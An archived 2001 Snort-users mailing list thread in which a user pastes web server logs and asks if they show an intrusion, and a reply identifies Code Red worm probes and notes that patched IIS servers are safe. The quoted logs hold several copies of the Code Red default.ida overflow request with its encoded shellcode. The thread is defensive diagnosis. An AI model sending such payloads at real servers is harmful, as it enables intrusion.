[Snort-users] WHAT IT MEAN

Dan Cuthbert dcuthbert at ...1623...
Tue Sep 11 02:12:01 EDT 2001


Hmmm looks like that little "funlovingovertimeracking" bug called codered has 
infected a box and now its looking for other servers to infect

as long as your running a patched IIS server, your okay

Dan

On Tuesday 11 September 2001 08:21, Alessandro Coppelli tapped away:
>   What it mean ? Is it a intrusion ?
>
> ==============================================
>
> 131.115.231.62 - - [07/Sep/2001:15:59:53 +0200] "-" 408 -
> 202.128.139.105 - - [07/Sep/2001:16:32:41 +0200] "-" 408 -
> 211.230.87.30 - - [07/Sep/2001:22:15:35 +0200] "-" 408 -
> 172.189.91.93 - - [08/Sep/2001:00:28:24 +0200] "-" 408 -
> 172.144.211.217 - - [08/Sep/2001:01:25:49 +0200] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
>%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 280
> 61.13.210.188 - - [10/Sep/2001:10:19:54 +0200] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
>%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 280
> 213.194.96.29 - - [10/Sep/2001:12:34:42 +0200] "-" 408 -
> 61.134.176.189 - - [10/Sep/2001:12:38:03 +0200] "-" 408 -
> 131.107.78.108 - - [10/Sep/2001:14:35:13 +0200] "-" 408 -
> 61.183.121.70 - - [10/Sep/2001:14:56:57 +0200] "-" 408 -
> 24.101.169.90 - - [10/Sep/2001:19:43:47 +0200] "-" 408 -
> 131.194.131.79 - - [10/Sep/2001:19:47:20 +0200] "-" 408 -
> 172.182.159.150 - - [11/Sep/2001:03:50:43 +0200] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
>%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 280
> 159.226.187.92 - - [11/Sep/2001:05:19:45 +0200] "GET http://www.s3.com/
> HTTP/1.1" 200 13726
> 62.227.232.74 - - [11/Sep/2001:05:55:38 +0200] "-" 408 -
>
>
>
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://www.geocrawler.com/redir-sf.php3?list=snort-users




More information about the Snort-users mailing list